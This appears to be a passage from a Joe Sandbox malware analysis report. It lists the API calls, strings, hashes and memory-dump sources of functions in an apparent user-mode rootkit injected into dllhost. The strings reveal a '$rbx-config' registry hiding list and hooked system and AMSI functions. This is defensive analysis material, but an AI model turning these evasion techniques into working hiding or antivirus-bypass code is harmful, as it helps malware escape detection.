Instruction Fuzzy Hash: FFA1E632788680C9FB2ADB759480BEF7BA0A789F9CF144115DB5B37AB9DA34C441E700

Function 000000014000151C Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001527
HeapAlloc.KERNEL32 ref: 0000000140001536

Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
Part of subcall function 0000000140001220: GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
Part of subcall function 0000000140001220: HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
Part of subcall function 0000000140001000: GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
Part of subcall function 0000000140001000: HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

RegOpenKeyExW.ADVAPI32 ref: 00000001400015A6
RegOpenKeyExW.ADVAPI32 ref: 00000001400015D3
RegCloseKey.ADVAPI32 ref: 00000001400015ED
RegOpenKeyExW.ADVAPI32 ref: 000000014000160D
RegCloseKey.ADVAPI32 ref: 0000000140001628
RegOpenKeyExW.ADVAPI32 ref: 0000000140001648
RegCloseKey.ADVAPI32 ref: 0000000140001663
RegOpenKeyExW.ADVAPI32 ref: 0000000140001683
RegCloseKey.ADVAPI32 ref: 000000014000169E
RegOpenKeyExW.ADVAPI32 ref: 00000001400016BE
RegCloseKey.ADVAPI32 ref: 00000001400016D9
RegOpenKeyExW.ADVAPI32 ref: 00000001400016F9
RegCloseKey.ADVAPI32 ref: 0000000140001714
RegOpenKeyExW.ADVAPI32 ref: 0000000140001734
RegCloseKey.ADVAPI32 ref: 000000014000174F
RegOpenKeyExW.ADVAPI32 ref: 000000014000176F
RegCloseKey.ADVAPI32 ref: 000000014000178A
RegCloseKey.ADVAPI32 ref: 0000000140001794

Part of subcall function 0000000140001274: RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400012DF
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400012F0
Part of subcall function 0000000140001274: RegEnumValueW.ADVAPI32 ref: 000000014000134F
Part of subcall function 0000000140001274: StrCmpIW.SHLWAPI ref: 0000000140001388
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013C7
Part of subcall function 0000000140001274: HeapAlloc.KERNEL32 ref: 00000001400013D5
Part of subcall function 0000000140001274: GetProcessHeap.KERNEL32 ref: 00000001400013F2
Part of subcall function 0000000140001274: HeapFree.KERNEL32 ref: 0000000140001400

Strings

SOFTWARE\$rbx-config, xrefs: 0000000140001586
udp, xrefs: 0000000140001768
pid, xrefs: 0000000140001606
process_names, xrefs: 0000000140001641
tcp_local, xrefs: 00000001400016F2
service_names, xrefs: 00000001400016B7
startup, xrefs: 00000001400015C9
paths, xrefs: 000000014000167C
tcp_remote, xrefs: 000000014000172D

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 3993315683-3414887735
Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Function 000001C0401F1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401F172F
HeapAlloc.KERNEL32 ref: 000001C0401F173E

Part of subcall function 000001C0401F1264: GetProcessHeap.KERNEL32 ref: 000001C0401F126A
Part of subcall function 000001C0401F1264: HeapAlloc.KERNEL32 ref: 000001C0401F1279
Part of subcall function 000001C0401F1264: GetProcessHeap.KERNEL32 ref: 000001C0401F1293
Part of subcall function 000001C0401F1264: HeapAlloc.KERNEL32 ref: 000001C0401F12A4

Part of subcall function 000001C0401F1000: GetProcessHeap.KERNEL32 ref: 000001C0401F1006
Part of subcall function 000001C0401F1000: HeapAlloc.KERNEL32 ref: 000001C0401F1015
Part of subcall function 000001C0401F1000: GetProcessHeap.KERNEL32 ref: 000001C0401F1028
Part of subcall function 000001C0401F1000: HeapAlloc.KERNEL32 ref: 000001C0401F1037

RegOpenKeyExW.ADVAPI32 ref: 000001C0401F17AE
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F17DB
RegCloseKey.ADVAPI32 ref: 000001C0401F17F5
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F1815
RegCloseKey.ADVAPI32 ref: 000001C0401F1830
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F1850
RegCloseKey.ADVAPI32 ref: 000001C0401F186B
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F188B
RegCloseKey.ADVAPI32 ref: 000001C0401F18A6
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F18C6
RegCloseKey.ADVAPI32 ref: 000001C0401F18E1
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F1901
RegCloseKey.ADVAPI32 ref: 000001C0401F191C
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F193C
RegCloseKey.ADVAPI32 ref: 000001C0401F1957
RegOpenKeyExW.ADVAPI32 ref: 000001C0401F1977
RegCloseKey.ADVAPI32 ref: 000001C0401F1992
RegCloseKey.ADVAPI32 ref: 000001C0401F199C

Part of subcall function 000001C0401F12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401F1315
Part of subcall function 000001C0401F12B8: GetProcessHeap.KERNEL32 ref: 000001C0401F1323
Part of subcall function 000001C0401F12B8: HeapAlloc.KERNEL32 ref: 000001C0401F1334
Part of subcall function 000001C0401F12B8: RegEnumValueW.ADVAPI32 ref: 000001C0401F1393
Part of subcall function 000001C0401F12B8: GetProcessHeap.KERNEL32 ref: 000001C0401F13DB
Part of subcall function 000001C0401F12B8: HeapAlloc.KERNEL32 ref: 000001C0401F13E9
Part of subcall function 000001C0401F12B8: GetProcessHeap.KERNEL32 ref: 000001C0401F1406
Part of subcall function 000001C0401F12B8: HeapFree.KERNEL32 ref: 000001C0401F1414
Part of subcall function 000001C0401F12B8: lstrlenW.KERNEL32 ref: 000001C0401F141D
Part of subcall function 000001C0401F12B8: GetProcessHeap.KERNEL32 ref: 000001C0401F142B
Part of subcall function 000001C0401F12B8: HeapAlloc.KERNEL32 ref: 000001C0401F1439

Strings

tcp_local, xrefs: 000001C0401F18FA
SOFTWARE\$rbx-config, xrefs: 000001C0401F178E
udp, xrefs: 000001C0401F1970
startup, xrefs: 000001C0401F17D1
pid, xrefs: 000001C0401F180E
process_names, xrefs: 000001C0401F1849
paths, xrefs: 000001C0401F1884
tcp_remote, xrefs: 000001C0401F1935
service_names, xrefs: 000001C0401F18BF

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 63c0af586dce6bff2cd4097693a3b49f886f3d37a5b8c0fa74ace211ab03a56f
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 13710776250B52C5FB15EF66E894ADE23A5FB8DB8CF406111DB4E67BA8DE38C444C340

Function 000001C0401C1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401C172F
HeapAlloc.KERNEL32 ref: 000001C0401C173E

Part of subcall function 000001C0401C1264: GetProcessHeap.KERNEL32 ref: 000001C0401C126A
Part of subcall function 000001C0401C1264: HeapAlloc.KERNEL32 ref: 000001C0401C1279
Part of subcall function 000001C0401C1264: GetProcessHeap.KERNEL32 ref: 000001C0401C1293
Part of subcall function 000001C0401C1264: HeapAlloc.KERNEL32 ref: 000001C0401C12A4

Part of subcall function 000001C0401C1000: GetProcessHeap.KERNEL32 ref: 000001C0401C1006
Part of subcall function 000001C0401C1000: HeapAlloc.KERNEL32 ref: 000001C0401C1015
Part of subcall function 000001C0401C1000: GetProcessHeap.KERNEL32 ref: 000001C0401C1028
Part of subcall function 000001C0401C1000: HeapAlloc.KERNEL32 ref: 000001C0401C1037

RegOpenKeyExW.ADVAPI32 ref: 000001C0401C17AE
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C17DB
RegCloseKey.ADVAPI32 ref: 000001C0401C17F5
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C1815
RegCloseKey.ADVAPI32 ref: 000001C0401C1830
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C1850
RegCloseKey.ADVAPI32 ref: 000001C0401C186B
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C188B
RegCloseKey.ADVAPI32 ref: 000001C0401C18A6
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C18C6
RegCloseKey.ADVAPI32 ref: 000001C0401C18E1
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C1901
RegCloseKey.ADVAPI32 ref: 000001C0401C191C
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C193C
RegCloseKey.ADVAPI32 ref: 000001C0401C1957
RegOpenKeyExW.ADVAPI32 ref: 000001C0401C1977
RegCloseKey.ADVAPI32 ref: 000001C0401C1992
RegCloseKey.ADVAPI32 ref: 000001C0401C199C

Part of subcall function 000001C0401C12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401C1315
Part of subcall function 000001C0401C12B8: GetProcessHeap.KERNEL32 ref: 000001C0401C1323
Part of subcall function 000001C0401C12B8: HeapAlloc.KERNEL32 ref: 000001C0401C1334
Part of subcall function 000001C0401C12B8: RegEnumValueW.ADVAPI32 ref: 000001C0401C1393
Part of subcall function 000001C0401C12B8: GetProcessHeap.KERNEL32 ref: 000001C0401C13DB
Part of subcall function 000001C0401C12B8: HeapAlloc.KERNEL32 ref: 000001C0401C13E9
Part of subcall function 000001C0401C12B8: GetProcessHeap.KERNEL32 ref: 000001C0401C1406
Part of subcall function 000001C0401C12B8: HeapFree.KERNEL32 ref: 000001C0401C1414
Part of subcall function 000001C0401C12B8: lstrlenW.KERNEL32 ref: 000001C0401C141D
Part of subcall function 000001C0401C12B8: GetProcessHeap.KERNEL32 ref: 000001C0401C142B
Part of subcall function 000001C0401C12B8: HeapAlloc.KERNEL32 ref: 000001C0401C1439

Strings

SOFTWARE\$rbx-config, xrefs: 000001C0401C178E
startup, xrefs: 000001C0401C17D1
pid, xrefs: 000001C0401C180E
service_names, xrefs: 000001C0401C18BF
paths, xrefs: 000001C0401C1884
tcp_local, xrefs: 000001C0401C18FA
tcp_remote, xrefs: 000001C0401C1935
process_names, xrefs: 000001C0401C1849
udp, xrefs: 000001C0401C1970

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: b0eec26777479531566f6caa5bd0839dab250b02c4310144435cab1ad09b838c
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: E971D636294A51C6FB15EF65E890ADA23A4FB89F8CF405112EB4F67B78DE38C454C740

Function 000001C0401F1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001C0401F1E7F

Part of subcall function 000001C0401F22A8: GetModuleHandleA.KERNEL32(?,?,?,000001C0401F1EB1), ref: 000001C0401F22C0
Part of subcall function 000001C0401F22A8: GetProcAddress.KERNEL32(?,?,?,000001C0401F1EB1), ref: 000001C0401F22D1

CreateThread.KERNEL32 ref: 000001C0401F2043
TlsAlloc.KERNEL32 ref: 000001C0401F2049
TlsAlloc.KERNEL32 ref: 000001C0401F2055
TlsAlloc.KERNEL32 ref: 000001C0401F2061
TlsAlloc.KERNEL32 ref: 000001C0401F206D
TlsAlloc.KERNEL32 ref: 000001C0401F2079
TlsAlloc.KERNEL32 ref: 000001C0401F2085

Strings

sechost.dll, xrefs: 000001C0401F1F99
AmsiScanBuffer, xrefs: 000001C0401F2012
NtQuerySystemInformation, xrefs: 000001C0401F1EA5
NtDeviceIoControlFile, xrefs: 000001C0401F1FB6
advapi32.dll, xrefs: 000001C0401F1F57, 000001C0401F1F78
amsi.dll, xrefs: 000001C0401F2019
pdh.dll, xrefs: 000001C0401F1FD7, 000001C0401F1FF8
NtResumeThread, xrefs: 000001C0401F1EC2
NtQueryDirectoryFile, xrefs: 000001C0401F1EDF
PdhGetRawCounterArrayW, xrefs: 000001C0401F1FD0
EnumServicesStatusExW, xrefs: 000001C0401F1F71, 000001C0401F1F92
NtQueryDirectoryFileEx, xrefs: 000001C0401F1EFC
EnumServiceGroupW, xrefs: 000001C0401F1F50
NtEnumerateValueKey, xrefs: 000001C0401F1F36
PdhGetFormattedCounterArrayW, xrefs: 000001C0401F1FF1
ntdll.dll, xrefs: 000001C0401F1E8D
NtEnumerateKey, xrefs: 000001C0401F1F19

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 2909d0be9a97d05e43a29b6993d0b555e120d64c891fdd689e49314e0f8e7216
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 505170B01D1A4AE5FB0AEB64EE40FD72320A74CB4CF904523D70A365B6DE78C25AC781

Function 000001C0401C1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001C0401C1E7F

Part of subcall function 000001C0401C22A8: GetModuleHandleA.KERNEL32(?,?,?,000001C0401C1EB1), ref: 000001C0401C22C0
Part of subcall function 000001C0401C22A8: GetProcAddress.KERNEL32(?,?,?,000001C0401C1EB1), ref: 000001C0401C22D1

CreateThread.KERNEL32 ref: 000001C0401C2043
TlsAlloc.KERNEL32 ref: 000001C0401C2049
TlsAlloc.KERNEL32 ref: 000001C0401C2055
TlsAlloc.KERNEL32 ref: 000001C0401C2061
TlsAlloc.KERNEL32 ref: 000001C0401C206D
TlsAlloc.KERNEL32 ref: 000001C0401C2079
TlsAlloc.KERNEL32 ref: 000001C0401C2085

Strings

amsi.dll, xrefs: 000001C0401C2019
NtQuerySystemInformation, xrefs: 000001C0401C1EA5
NtDeviceIoControlFile, xrefs: 000001C0401C1FB6
NtQueryDirectoryFileEx, xrefs: 000001C0401C1EFC
NtEnumerateValueKey, xrefs: 000001C0401C1F36
NtEnumerateKey, xrefs: 000001C0401C1F19
PdhGetFormattedCounterArrayW, xrefs: 000001C0401C1FF1
AmsiScanBuffer, xrefs: 000001C0401C2012
PdhGetRawCounterArrayW, xrefs: 000001C0401C1FD0
EnumServicesStatusExW, xrefs: 000001C0401C1F71, 000001C0401C1F92
EnumServiceGroupW, xrefs: 000001C0401C1F50
NtResumeThread, xrefs: 000001C0401C1EC2
ntdll.dll, xrefs: 000001C0401C1E8D
sechost.dll, xrefs: 000001C0401C1F99
advapi32.dll, xrefs: 000001C0401C1F57, 000001C0401C1F78
pdh.dll, xrefs: 000001C0401C1FD7, 000001C0401C1FF8
NtQueryDirectoryFile, xrefs: 000001C0401C1EDF

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: cc11b408aca93a02ae4f5107d11477bcbf574cac8075e55e7da5c8f93156a76d
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: FD5154705E4A4AE6FB0ADB64EC45FDA2321AB4CF4CF904912DA0B63575DE78D25AC380

Function 000001C0401F12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401F1315
GetProcessHeap.KERNEL32 ref: 000001C0401F1323
HeapAlloc.KERNEL32 ref: 000001C0401F1334
RegEnumValueW.ADVAPI32 ref: 000001C0401F1393

Part of subcall function 000001C0401F1530: StrCmpIW.SHLWAPI ref: 000001C0401F1561

GetProcessHeap.KERNEL32 ref: 000001C0401F13DB
HeapAlloc.KERNEL32 ref: 000001C0401F13E9
GetProcessHeap.KERNEL32 ref: 000001C0401F1406
HeapFree.KERNEL32 ref: 000001C0401F1414
lstrlenW.KERNEL32 ref: 000001C0401F141D
GetProcessHeap.KERNEL32 ref: 000001C0401F142B
HeapAlloc.KERNEL32 ref: 000001C0401F1439
StrCpyW.SHLWAPI ref: 000001C0401F145B
GetProcessHeap.KERNEL32 ref: 000001C0401F1472
HeapFree.KERNEL32 ref: 000001C0401F1480

Strings

d, xrefs: 000001C0401F1356

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: d0e8a6c38eb3db86fc6bc5d2415ad49811ff28525530ee78b62baf9c7bfd7613
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 7E514832240B95DAE729DF62E5487ABA7A1F78DF98F444124DB4A17B68DF3CC0498B00

Function 000001C0401C12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001C0401C1315
GetProcessHeap.KERNEL32 ref: 000001C0401C1323
HeapAlloc.KERNEL32 ref: 000001C0401C1334
RegEnumValueW.ADVAPI32 ref: 000001C0401C1393

Part of subcall function 000001C0401C1530: StrCmpIW.SHLWAPI ref: 000001C0401C1561

GetProcessHeap.KERNEL32 ref: 000001C0401C13DB
HeapAlloc.KERNEL32 ref: 000001C0401C13E9
GetProcessHeap.KERNEL32 ref: 000001C0401C1406
HeapFree.KERNEL32 ref: 000001C0401C1414
lstrlenW.KERNEL32 ref: 000001C0401C141D
GetProcessHeap.KERNEL32 ref: 000001C0401C142B
HeapAlloc.KERNEL32 ref: 000001C0401C1439
StrCpyW.SHLWAPI ref: 000001C0401C145B
GetProcessHeap.KERNEL32 ref: 000001C0401C1472
HeapFree.KERNEL32 ref: 000001C0401C1480

Strings

d, xrefs: 000001C0401C1356

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: b22ff8036c1da1c3ad31e4595c0a8850c1ed2bc468cf833b4e8685240a5d3402
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: A3514932284B84DAF729DF62E448B9A77A1FB89F99F444124DB4B57728DF3CD0498700

Function 000001C0401FEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001C0401FF34A,?,?,00000000,000001C0401FF2CD), ref: 000001C0401FEFF5
GetLastError.KERNEL32(?,?,00000000,000001C0401FF2CD), ref: 000001C0401FF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001C0401FF2CD), ref: 000001C0401FF049
VirtualProtect.KERNEL32 ref: 000001C0401FF0A5
VirtualProtect.KERNEL32 ref: 000001C0401FF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001C0401FF2CD), ref: 000001C0401FF11A
GetProcAddress.KERNEL32(?,?,00000000,000001C0401FF2CD), ref: 000001C0401FF126

Strings

ext-ms-, xrefs: 000001C0401FF02E
AppPolicyGetProcessTerminationMethod, xrefs: 000001C0401FF157, 000001C0401FF165
api-ms-, xrefs: 000001C0401FF01B

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 6f0a6ca945857f10acad8be69f9231fa6bfc19f0ab3738687d31aa9c2c963ed5
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 5451BE31780746C1FA1ADB16A940BEB2291AB4CFB8F4807289F3E673E0EF78D4058640

Function 000001C0401CEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001C0401CF34A,?,?,00000000,000001C0401CF2CD), ref: 000001C0401CEFF5
GetLastError.KERNEL32(?,?,00000000,000001C0401CF2CD), ref: 000001C0401CF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001C0401CF2CD), ref: 000001C0401CF049
VirtualProtect.KERNEL32 ref: 000001C0401CF0A5
VirtualProtect.KERNEL32 ref: 000001C0401CF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001C0401CF2CD), ref: 000001C0401CF11A
GetProcAddress.KERNEL32(?,?,00000000,000001C0401CF2CD), ref: 000001C0401CF126

Strings

api-ms-, xrefs: 000001C0401CF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001C0401CF157, 000001C0401CF165
ext-ms-, xrefs: 000001C0401CF02E

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

